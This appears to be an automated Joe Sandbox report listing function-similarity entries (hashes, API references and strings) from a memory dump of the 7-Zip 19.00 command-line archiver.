                                                                                                                                                                                                                                • Opcode ID: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                                                                                                                • Instruction ID: bd9e3e95749076f33f75912a620f73c56616650728fd81cd2fcc4d0cc65c59f9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A51D572314B8592CA21DF56E8807AEA721F7A97D4F840126FF9913B59DFB8C946CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 408039514-0
                                                                                                                                                                                                                                • Opcode ID: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                                                                                                                • Instruction ID: 6786b37a11226447217c3dc4b1e2f44031fbf45d22b77c3e19f510e14a30b77e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A451832221C94092DA20EF25E49166EB770EBE17A4F541213FB9E437B9EF78D946CB10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs
                                                                                                                                                                                                                                • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                                                                                                                                                                                                                                • API String ID: 1795875747-2836439314
                                                                                                                                                                                                                                • Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                                                • Instruction ID: ca520d1091d6527d6e12cd6d2b798dadc3b9cb6017f43b7f06d9476cc464dd75
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC1193B5320591A2EB25DF66EA49398A761F725BC4F448022CF5C03A64DF38CAF9C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free
                                                                                                                                                                                                                                • String ID: $ MB$ Memory =
                                                                                                                                                                                                                                • API String ID: 3873070119-2616823926
                                                                                                                                                                                                                                • Opcode ID: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                                                                                                                                                                                • Instruction ID: 90e925b5692064984a01c38d024601d5571471ac5fff5fa97a4a52e8359f4527
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1811F1B220094191EB10DF25E95839A6330F7A4BE5F449222EE7E537B4DF3CC555C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 002130E7
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00213104
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00213114
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00213132
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free
                                                                                                                                                                                                                                • String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
                                                                                                                                                                                                                                • API String ID: 3873070119-2741933734
                                                                                                                                                                                                                                • Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                                                • Instruction ID: f85e2d66893cc0d7f5b7bc1c8c481fd08998b02b0b4b12469b9369eb09419ea5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F01D75300E55A1EE11DFA6E9983A9A321BB69FD9F849022DE7E03364DF3CC549C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: a894c9f81bc7411e424a6da5d140685d4e31b34b16989fe922eef7c3468bf76d
                                                                                                                                                                                                                                • Instruction ID: f6ca5b38905eea7c78a3e8ad40eda6d127f847daa4953f5017dfe12c7cf64956
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a894c9f81bc7411e424a6da5d140685d4e31b34b16989fe922eef7c3468bf76d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BE18D32324B8192CBA4DF25D59475EB7A1F798B84F048422DF9E43B66DF78C8A5C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 001D6F6D
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 001D6F78
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 001D6F85
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 001D7023
                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 001D705C
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 001D7086
                                                                                                                                                                                                                                  • Part of subcall function 001D6C84: CreateDirectoryW.KERNEL32 ref: 001D6CA8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThreadfreememmove
                                                                                                                                                                                                                                • String ID: .tmp$d
                                                                                                                                                                                                                                • API String ID: 3444860307-2797371523
                                                                                                                                                                                                                                • Opcode ID: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                                                                                                                • Instruction ID: 5587711ce9238723cdcc1c96d339cfb506673d3f6a0239b49c8007c01a92e51e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03316636314260D7DB24EB26E85079DA361BBA5BC0F448123EE9647BB0EB7DC582C301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: CreateHardLinkW$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 399046674-294928789
                                                                                                                                                                                                                                • Opcode ID: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                                                                                                                • Instruction ID: 731c8b1a510af2e1df2bc4e19d2b843d1bd4ccfffc8e89e982592cd77c066be8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9921A46332555151CE60EB29EC517AF6720EBE27D0F982223FEAE87765DF28C846C610
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 7aae74738ebb1fa26e9c45f1fe68a2e26c39cce5353d9637d771cf3076791eab
                                                                                                                                                                                                                                • Instruction ID: 98231f271d25a7693f3c87a335606a67bbd7cf9149a29956c0066c84042468be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7aae74738ebb1fa26e9c45f1fe68a2e26c39cce5353d9637d771cf3076791eab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A519E23315A4095CA21EF25E85016BA770FBE5BE4B584227FF6E4B768EF38C946C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                                                                                                                • Instruction ID: 7c9efd482508563b021798ce3ac8693c96f25e5388f653adf7944dca6880b05d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0641AC23714DC086CB30AE56EC9016D636AF7997A4F6E4236EF6E17B14DF38D8828740
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e1faaf7df75186d5ae884903546cdcce3f308a231f1a81c91827175cf65db9ce
                                                                                                                                                                                                                                • Instruction ID: 02ad42a090dd62a415e91668608dec65aff5330a55688942e05a9b9c43cd65f0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1faaf7df75186d5ae884903546cdcce3f308a231f1a81c91827175cf65db9ce
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E91ED32228B5086DB20DF25E49035FB3B0F7A0B98F548217EA5A477A9DF78D895CF40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 7386053c805783c8b149fe4df64e3429d83df24b0f84080fe73c7ae0aa69eb51
                                                                                                                                                                                                                                • Instruction ID: 5d2c8627074d6b7264535eb119794ae0a19394ce2e3dd3aa31257c42372a0c6e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7386053c805783c8b149fe4df64e3429d83df24b0f84080fe73c7ae0aa69eb51
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF515A67219AC485C720DF26E49039E7761F79AB88F445012DF8E67B25CF39C466CB14
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                                                • Instruction ID: 826a3b3aa4b355f0fabbba0d87bd2744cf4f888e494f701c6251f666d1fffd88
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D74105B6215B8482CB24DF26E8942AE6371F7D9F94F459422DB5E43725DF39C4A5C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                                                • Instruction ID: de16441f5ba02673b8486050f7d16ccaa914cc73c01d37e6b03fbbac12c1e208
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B411162371198488CB11AE26DC512EC6231EBB6FA8F1D8176EF3D5B359DF30D8928360
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                                                • Instruction ID: 1d8fd5f7c9143da0aaf5efbe821974c9a48fc264a1ad50c102cd0caf812f70bd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3301D323321944928A04EF26DA9146C7330FBA6B947088166EB3E4BB65DF30E866C364
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: /$\$a$z
                                                                                                                                                                                                                                • API String ID: 1294909896-3795456795
                                                                                                                                                                                                                                • Opcode ID: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                                                • Instruction ID: a24efdde60b341206985f844d9165e3eb034fbe991d92b43d665d6e15f4dd43f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8941E492A2034699DB30EF21D80C6B93B74F311B94FC94226DB55037D6EBBA89F6C701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 0021877E
                                                                                                                                                                                                                                • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 0021878E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$fputs
                                                                                                                                                                                                                                • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                                                                                                                • API String ID: 2444650769-4238946813
                                                                                                                                                                                                                                • Opcode ID: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                                                • Instruction ID: 21c917562b6da6f368847bcda30bed42a10579aca3de159e8f1d6328b91364fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7721A1373156C595DA309F11F9C43EAB361B7A4780FA88422CA5D97B58CF3CC896CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
